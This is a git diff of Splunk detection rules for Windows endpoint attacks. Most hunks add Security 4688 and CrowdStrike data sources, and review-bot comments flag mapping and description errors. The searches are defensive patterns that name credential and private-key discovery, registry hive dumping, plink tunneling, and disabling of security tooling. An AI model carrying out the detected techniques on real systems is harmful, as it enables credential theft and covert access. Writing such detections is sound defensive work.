index 5b665a92f8..54621c2250 100644
--- a/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml
+++ b/detections/endpoint/windows_phishing_recent_iso_exec_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation of registry artifacts w
an initial access attempt, potentially leading to further exploitation, persistence,
or data exfiltration within the environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_key_name= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RecentDocs\\.iso"
diff --git a/detections/endpoint/windows_powershell_remotesigned_file.yml b/detections/endpoint/windows_powershell_remotesigned_file.yml
index 0c4c88c01c..82ee57dd4a 100644
--- a/detections/endpoint/windows_powershell_remotesigned_file.yml
+++ b/detections/endpoint/windows_powershell_remotesigned_file.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the use of the "remotesigned" execution
policy for PowerShell scripts. It leverages data from Endpoint Detection and Response
(EDR) agents, focusing on command-line executions containing "remotesigned" and
diff --git a/detections/endpoint/windows_private_keys_discovery.yml b/detections/endpoint/windows_private_keys_discovery.yml
index 8434dab2bb..5ec5ce937b 100644
--- a/detections/endpoint/windows_private_keys_discovery.yml
+++ b/detections/endpoint/windows_private_keys_discovery.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies processes that retrieve informati
within the compromised environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "*dir *"
OR Processes.process = "*findstr*" AND Processes.process IN ( "*.rdg*", "*.gpg*",
diff --git a/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml b/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml
index 260cd7c510..8320268295 100644
--- a/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml
+++ b/detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml
@@ -8,13 +8,15 @@ type: TTP
description: The following analytic detects when a process running with low or medium
integrity from a user account spawns an elevated process with high or system integrity
in suspicious locations. This behavior is identified using process execution data
- from Windows process monitoring or Sysmon Event ID 1. This activity is significant
+ from Windows process monitoring or Sysmon EventID 1. This activity is significant
as it may indicate a threat actor successfully elevating privileges, which is a
common tactic in advanced attacks. If confirmed malicious, this could allow the
attacker to execute code with higher privileges, potentially leading to full system
compromise and persistent access.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: >-
| tstats `security_content_summariesonly` count min(_time) as firstTime from datamodel=Endpoint.Processes
where Processes.process_integrity_level IN ("low","medium","high") NOT Processes.user
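Review bot: The search keys on `Processes.process_integrity_level`, and the sources added at `- Windows Event Log Security 4688` and `- CrowdStrike ProcessRollup2` may not populate that field in Endpoint.Processes — the existing mapping relies on Sysmon's IntegrityLevel, so confirm that the 4688 and ProcessRollup2 add-ons map an integrity-level field before listing them, otherwise the detection silently ignores those sources while claiming to cover them. The same applies to the windows_privilege_escalation_user_process_spawn_system_process hunk further down. The search continues outside the hunk.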
diff --git a/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml b/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml
index 61bd65496c..a879e325d8 100644
--- a/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml
+++ b/detections/endpoint/windows_privilege_escalation_system_process_without_system_parent.yml
@@ -6,13 +6,15 @@ author: Steven Dick
status: production
type: TTP
description: The following analytic detects any system integrity level process spawned
- by a non-system account. It leverages Sysmon Event ID 1, focusing on process integrity
+ by a non-system account. It leverages Sysmon EventID 1, focusing on process integrity
and parent user data. This behavior is significant as it often indicates successful
privilege escalation to SYSTEM from a user-controlled process or service. If confirmed
malicious, this activity could allow an attacker to gain full control over the system,
execute arbitrary code, and potentially compromise the entire environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: >-
`sysmon` EventCode=1 IntegrityLevel="system" ParentUser=* NOT ParentUser IN ("*SYSTEM","*LOCAL
SERVICE","*NETWORK SERVICE","*DWM-*","*$","-") | eval src_user = replace(ParentUser,"^[^\\\]+\\\\","")
diff --git a/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml b/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml
index 72c1a9026f..801c75f46e 100644
--- a/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml
+++ b/detections/endpoint/windows_privilege_escalation_user_process_spawn_system_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects when a process with low, medium, or
access to sensitive data, and further malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: >-
| tstats `security_content_summariesonly` count min(_time) as firstTime from datamodel=Endpoint.Processes
where Processes.process_integrity_level IN ("low","medium","high") NOT Processes.user
diff --git a/detections/endpoint/windows_process_commandline_discovery.yml b/detections/endpoint/windows_process_commandline_discovery.yml
index 8f0e4adcdb..7f43b2812b 100644
--- a/detections/endpoint/windows_process_commandline_discovery.yml
+++ b/detections/endpoint/windows_process_commandline_discovery.yml
@@ -7,6 +7,8 @@ status: production
type: Hunting
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the use of Windows Management Instrumentation
Command-line (WMIC) to retrieve information about running processes, specifically
targeting the command lines used to launch those processes. This detection leverages
diff --git a/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml b/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml
index 8eee5c8a5b..d8485edfd8 100644
--- a/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml
+++ b/detections/endpoint/windows_process_injection_in_non_service_searchindexer.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies instances of the searchindexer.exe
process that are not spawned by services.exe, indicating potential process injection.
This detection leverages data from Endpoint Detection and Response (EDR) agents,
diff --git a/detections/endpoint/windows_process_injection_wermgr_child_process.yml b/detections/endpoint/windows_process_injection_wermgr_child_process.yml
index 16b9b8a305..05db4a79a4 100644
--- a/detections/endpoint/windows_process_injection_wermgr_child_process.yml
+++ b/detections/endpoint/windows_process_injection_wermgr_child_process.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a suspicious instance of wermgr.e
posing a severe security risk.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name
= "wermgr.exe" AND NOT (Processes.process_name IN ("WerFaultSecure.exe", "wermgr.exe",
diff --git a/detections/endpoint/windows_process_with_namedpipe_commandline.yml b/detections/endpoint/windows_process_with_namedpipe_commandline.yml
index ff2054e86f..82887100fe 100644
--- a/detections/endpoint/windows_process_with_namedpipe_commandline.yml
+++ b/detections/endpoint/windows_process_with_namedpipe_commandline.yml
@@ -15,6 +15,8 @@ description: The following analytic detects processes with command lines contain
compromise of the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "*\\\\.\\pipe\\*"
NOT (Processes.process_path IN ("*\\program files*")) by Processes.parent_process_name
diff --git a/detections/endpoint/windows_protocol_tunneling_with_plink.yml b/detections/endpoint/windows_protocol_tunneling_with_plink.yml
index 9acb8d813b..f63bd484c1 100644
--- a/detections/endpoint/windows_protocol_tunneling_with_plink.yml
+++ b/detections/endpoint/windows_protocol_tunneling_with_plink.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of Plink for protocol tunnel
severe threat to the organization's security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=plink.exe
OR Processes.original_file_name=Plink Processes.process IN ("*-R *", "*-L *", "*-D
diff --git a/detections/endpoint/windows_proxy_via_netsh.yml b/detections/endpoint/windows_proxy_via_netsh.yml
index b98c7ba434..f72b9963f7 100644
--- a/detections/endpoint/windows_proxy_via_netsh.yml
+++ b/detections/endpoint/windows_proxy_via_netsh.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the use of netsh.exe to configure a
connection proxy, which can be leveraged for persistence by executing a helper DLL.
It detects this activity by analyzing process creation events from Endpoint Detection
diff --git a/detections/endpoint/windows_proxy_via_registry.yml b/detections/endpoint/windows_proxy_via_registry.yml
index 1632eb4c23..54f12e54e0 100644
--- a/detections/endpoint/windows_proxy_via_registry.yml
+++ b/detections/endpoint/windows_proxy_via_registry.yml
@@ -6,7 +6,7 @@ author: Teoderick Contreras, Splunk
status: production
type: Anomaly
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects the modification of registry keys related
to the Windows Proxy settings via netsh.exe. It leverages data from the Endpoint.Registry
diff --git a/detections/endpoint/windows_query_registry_reg_save.yml b/detections/endpoint/windows_query_registry_reg_save.yml
index 8e299c1a7b..65375b15c8 100644
--- a/detections/endpoint/windows_query_registry_reg_save.yml
+++ b/detections/endpoint/windows_query_registry_reg_save.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of the reg.exe process
persist in the environment, or access sensitive information stored in the registry.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process
= "* save *" by Processes.process_name Processes.original_file_name Processes.process
diff --git a/detections/endpoint/windows_raccine_scheduled_task_deletion.yml b/detections/endpoint/windows_raccine_scheduled_task_deletion.yml
index fda8529ff6..cb5045f62c 100644
--- a/detections/endpoint/windows_raccine_scheduled_task_deletion.yml
+++ b/detections/endpoint/windows_raccine_scheduled_task_deletion.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the deletion of the Raccine Rules
to potential data encryption and loss.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
Processes.process="*delete*" AND Processes.process="*Raccine*" by Processes.dest
diff --git a/detections/endpoint/windows_rasautou_dll_execution.yml b/detections/endpoint/windows_rasautou_dll_execution.yml
index ab0e7049ac..03d814e613 100644
--- a/detections/endpoint/windows_rasautou_dll_execution.yml
+++ b/detections/endpoint/windows_rasautou_dll_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of an arbitrary DLL by
or persistent access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rasautou.exe
Processes.process="* -d *"AND Processes.process="* -p *" by Processes.dest Processes.user
diff --git a/detections/endpoint/windows_registry_bootexecute_modification.yml b/detections/endpoint/windows_registry_bootexecute_modification.yml
index c2ba83897b..546d7f54b7 100644
--- a/detections/endpoint/windows_registry_bootexecute_modification.yml
+++ b/detections/endpoint/windows_registry_bootexecute_modification.yml
@@ -6,7 +6,7 @@ author: Michael Haag, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: The following analytic detects modifications to the BootExecute registry
key, which manages applications and services executed during system boot. It leverages
diff --git a/detections/endpoint/windows_registry_certificate_added.yml b/detections/endpoint/windows_registry_certificate_added.yml
index a74e8c78bc..1166aab216 100644
--- a/detections/endpoint/windows_registry_certificate_added.yml
+++ b/detections/endpoint/windows_registry_certificate_added.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the installation of a root CA certif
attacker to intercept, decrypt, or manipulate sensitive data, leading to severe
security breaches.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
where Registry.registry_path IN ("*\\certificates\\*") AND Registry.registry_value_name="Blob"
diff --git a/detections/endpoint/windows_registry_delete_task_sd.yml b/detections/endpoint/windows_registry_delete_task_sd.yml
index ddbac21920..2b76652237 100644
--- a/detections/endpoint/windows_registry_delete_task_sd.yml
+++ b/detections/endpoint/windows_registry_delete_task_sd.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a process attempting to delete a sch
access trying to hide their tracks, potentially compromising system integrity and
security. Immediate investigation is required.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
where Registry.registry_path IN ("*\\Schedule\\TaskCache\\Tree\\*") Registry.user="SYSTEM"
diff --git a/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml b/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml
index 98fc743a01..8f49937bed 100644
--- a/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml
+++ b/detections/endpoint/windows_registry_modification_for_safe_mode_persistence.yml
@@ -14,7 +14,7 @@ description: The following analytic identifies modifications to the SafeBoot reg
potentially bypassing certain security measures and facilitating further malicious
actions.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count from datamodel=Endpoint.Registry
where Registry.registry_path IN ("*SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\*","*SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\*")
diff --git a/detections/endpoint/windows_registry_payload_injection.yml b/detections/endpoint/windows_registry_payload_injection.yml
index fc5a636e73..7268cbf11f 100644
--- a/detections/endpoint/windows_registry_payload_injection.yml
+++ b/detections/endpoint/windows_registry_payload_injection.yml
@@ -14,7 +14,8 @@ description: The following analytic detects suspiciously long data written to th
to maintain persistence, execute code, or manipulate system configurations without
leaving a conventional file footprint.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
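Review bot: The new entries `- Sysmon EventID 1 AND Sysmon EventID 12` and `- Sysmon EventID 1 AND Sysmon EventID 13` are compound strings in a field that every other detection in this diff fills with a single source name; if contentctl (bumped to 4.2.0 in this commit) resolves data_source values against the data_sources/ directory, these names must exist there or the build will reject the file — worth confirming before merge. If the intent is that the detection needs both process and registry events, listing the three sources separately is the representation the rest of the diff uses. The search continues outside the hunk.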
diff --git a/detections/endpoint/windows_registry_sip_provider_modification.yml b/detections/endpoint/windows_registry_sip_provider_modification.yml
index b3936c9b6a..e32c501a70 100644
--- a/detections/endpoint/windows_registry_sip_provider_modification.yml
+++ b/detections/endpoint/windows_registry_sip_provider_modification.yml
@@ -6,10 +6,10 @@ author: Michael Haag, Splunk
status: production
type: TTP
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
description: 'The following analytic detects modifications to the Windows Registry
- SIP Provider. It leverages Sysmon Event ID 7 to monitor registry changes in paths
+ SIP Provider. It leverages Sysmon EventID 7 to monitor registry changes in paths
and values related to Cryptography Providers and OID Encoding Types. This activity
is significant as it may indicate an attempt to subvert trust controls, a common
tactic for bypassing security measures and maintaining persistence. If confirmed
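Review bot: The rewording at `+ SIP Provider. It leverages Sysmon EventID 7 to monitor registry changes in paths` keeps a wrong event number: the data_source block in the same hunk lists Sysmon EventID 12 and 13, which are the registry object and value-set events, whereas Sysmon EventID 7 is image load and cannot observe registry changes. Change the line to `SIP Provider. It leverages Sysmon EventID 12 and 13 to monitor registry changes in paths`. The description continues outside the hunk.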
diff --git a/detections/endpoint/windows_regsvr32_renamed_binary.yml b/detections/endpoint/windows_regsvr32_renamed_binary.yml
index 364564698a..756589cc02 100644
--- a/detections/endpoint/windows_regsvr32_renamed_binary.yml
+++ b/detections/endpoint/windows_regsvr32_renamed_binary.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where the regsvr32.exe
persistence within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name != regsvr32.exe
AND Processes.original_file_name=regsvr32.exe by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_remote_access_software_hunt.yml b/detections/endpoint/windows_remote_access_software_hunt.yml
index cb2269e501..fca384f7fa 100644
--- a/detections/endpoint/windows_remote_access_software_hunt.yml
+++ b/detections/endpoint/windows_remote_access_software_hunt.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the use of remote access software
any unauthorized utilities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Processes.process) as process values(Processes.parent_process)
as parent_process from datamodel=Endpoint.Processes where Processes.dest!=unknown
diff --git a/detections/endpoint/windows_remote_access_software_rms_registry.yml b/detections/endpoint/windows_remote_access_software_rms_registry.yml
index bb79c75394..e883290d69 100644
--- a/detections/endpoint/windows_remote_access_software_rms_registry.yml
+++ b/detections/endpoint/windows_remote_access_software_rms_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the creation or modification of Wind
allow attackers to remotely control the targeted host, leading to potential data
exfiltration, system manipulation, or further network compromise.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\SYSTEM\\Remote
diff --git a/detections/endpoint/windows_remote_assistance_spawning_process.yml b/detections/endpoint/windows_remote_assistance_spawning_process.yml
index 9a76051121..8a42185fe2 100644
--- a/detections/endpoint/windows_remote_assistance_spawning_process.yml
+++ b/detections/endpoint/windows_remote_assistance_spawning_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects Microsoft Remote Assistance (msra.ex
on the compromised system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=msra.exe
`windows_shells` by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_remote_create_service.yml b/detections/endpoint/windows_remote_create_service.yml
index e904d6be26..540a231e87 100644
--- a/detections/endpoint/windows_remote_create_service.yml
+++ b/detections/endpoint/windows_remote_create_service.yml
@@ -7,6 +7,8 @@ status: production
type: Anomaly
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the creation of a new service on a
remote endpoint using sc.exe. It leverages data from Endpoint Detection and Response
(EDR) agents, specifically monitoring for EventCode 7045, which indicates a new
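Review bot: The data_source block now lists three process-creation sources, but the description in the same hunk says the analytic is `specifically monitoring for EventCode 7045`, which is a System-log service-install event rather than a process event, so one of the two is wrong. If the search (outside this hunk) is a tstats over Endpoint.Processes for sc.exe, reword the description to drop the 7045 claim; if it actually searches 7045, data_source should be `- Windows Event Log System 7045`, the form the windows_service_create_remcomsvc hunk at the end of this diff uses. The description continues outside the hunk.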
diff --git a/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml b/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml
index 8a4638c731..9102087879 100644
--- a/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml
+++ b/detections/endpoint/windows_remote_service_rdpwinst_tool_execution.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the RDPWInst.exe to
unauthorized access, data exfiltration, and further compromise of the targeted host.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where (Processes.process_name="RDPWInst.exe" OR Processes.original_file_name="RDPWInst.exe")
diff --git a/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml b/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml
index 4e48f92957..6bda4a9dc6 100644
--- a/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml
+++ b/detections/endpoint/windows_remote_services_allow_rdp_in_firewall.yml
@@ -15,6 +15,8 @@ description: The following analytic detects modifications to the Windows firewal
network compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as cmdline
values(Processes.parent_process_name) as parent_process values(Processes.process_name)
count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/windows_remote_services_allow_remote_assistance.yml b/detections/endpoint/windows_remote_services_allow_remote_assistance.yml
index 0c1d265e0b..390f815024 100644
--- a/detections/endpoint/windows_remote_services_allow_remote_assistance.yml
+++ b/detections/endpoint/windows_remote_services_allow_remote_assistance.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
remotely access and control the compromised host, leading to potential data exfiltration
or further system compromise.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Control\\Terminal
diff --git a/detections/endpoint/windows_remote_services_rdp_enable.yml b/detections/endpoint/windows_remote_services_rdp_enable.yml
index 8cdb6f35ef..4d62b4d31a 100644
--- a/detections/endpoint/windows_remote_services_rdp_enable.yml
+++ b/detections/endpoint/windows_remote_services_rdp_enable.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications in the Windows registr
host, potentially leading to further exploitation and lateral movement within the
network.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path= "*\\Control\\Terminal
diff --git a/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml b/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml
index 08b286b748..ec22b31589 100644
--- a/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml
+++ b/detections/endpoint/windows_rundll32_apply_user_settings_changes.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic detects the execution of a suspicious rundll32
command line that updates user-specific system parameters, such as desktop backgrounds,
display settings, and visual themes. It leverages data from Endpoint Detection and
diff --git a/detections/endpoint/windows_rundll32_webdav_request.yml b/detections/endpoint/windows_rundll32_webdav_request.yml
index 52a4f2f30b..162eecae41 100644
--- a/detections/endpoint/windows_rundll32_webdav_request.yml
+++ b/detections/endpoint/windows_rundll32_webdav_request.yml
@@ -7,6 +7,8 @@ type: TTP
status: production
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: The following analytic identifies the execution of rundll32.exe with
command-line arguments loading davclnt.dll and the davsetcookie function to access
a remote WebDAV instance. This detection leverages data from Endpoint Detection
diff --git a/detections/endpoint/windows_scheduled_task_created_via_xml.yml b/detections/endpoint/windows_scheduled_task_created_via_xml.yml
index fe8cfebc59..89770fce58 100644
--- a/detections/endpoint/windows_scheduled_task_created_via_xml.yml
+++ b/detections/endpoint/windows_scheduled_task_created_via_xml.yml
@@ -7,6 +7,8 @@ status: production
type: TTP
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
description: 'The following analytic detects the creation of scheduled tasks in Windows
using schtasks.exe with the -create flag and an XML parameter. This detection leverages
data from Endpoint Detection and Response (EDR) agents, focusing on command-line
diff --git a/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml b/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml
index 5890126fb4..613baa3846 100644
--- a/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml
+++ b/detections/endpoint/windows_scheduled_task_service_spawned_shell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects when the Task Scheduler service ("sv
persistence, or escalate privileges within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process="*\\system32\\svchost.exe*"
AND Processes.parent_process="*-k*" AND Processes.parent_process= "*netsvcs*" AND
diff --git a/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml b/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml
index 4b0730ba79..422b8186f5 100644
--- a/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml
+++ b/detections/endpoint/windows_scheduled_task_with_highest_privileges.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the creation of a new scheduled tas
system access and data breaches.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "schtasks.exe"
Processes.process = "*/rl *" Processes.process = "* highest *" by Processes.process_name
diff --git a/detections/endpoint/windows_schtasks_create_run_as_system.yml b/detections/endpoint/windows_schtasks_create_run_as_system.yml
index b92dfcc83b..4c101f1cb2 100644
--- a/detections/endpoint/windows_schtasks_create_run_as_system.yml
+++ b/detections/endpoint/windows_schtasks_create_run_as_system.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the creation of a new scheduled task
and mitigation are crucial to prevent further damage.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_schtasks` Processes.process="*/create
*" AND Processes.process="*/ru *" AND Processes.process="*system*" by Processes.dest
diff --git a/detections/endpoint/windows_security_account_manager_stopped.yml b/detections/endpoint/windows_security_account_manager_stopped.yml
index 26fba01c92..ea67e8ab1a 100644
--- a/detections/endpoint/windows_security_account_manager_stopped.yml
+++ b/detections/endpoint/windows_security_account_manager_stopped.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the stopping of the Windows Security
compromise.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime FROM datamodel=Endpoint.Processes WHERE ("Processes.process_name"="net*.exe"
"Processes.process"="*stop \"samss\"*") BY Processes.dest Processes.user Processes.process
diff --git a/detections/endpoint/windows_security_support_provider_reg_query.yml b/detections/endpoint/windows_security_support_provider_reg_query.yml
index 5f71816289..a411a590b5 100644
--- a/detections/endpoint/windows_security_support_provider_reg_query.yml
+++ b/detections/endpoint/windows_security_support_provider_reg_query.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies command-line activity querying th
system security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` AND Processes.process
= "* query *" AND Processes.process = "*\\SYSTEM\\CurrentControlSet\\Control\\LSA*"
diff --git a/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml b/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml
index 1cad2e24b4..be217da44e 100644
--- a/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml
+++ b/detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the use of GACUtil.exe to add a DLL
to privilege escalation or persistent access.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=gacutil.exe
Processes.process IN ("*-i *","*/i *") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/windows_service_create_kernel_mode_driver.yml b/detections/endpoint/windows_service_create_kernel_mode_driver.yml
index fc933c8469..707c7296c2 100644
--- a/detections/endpoint/windows_service_create_kernel_mode_driver.yml
+++ b/detections/endpoint/windows_service_create_kernel_mode_driver.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the creation of a new kernel mode
security measures.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
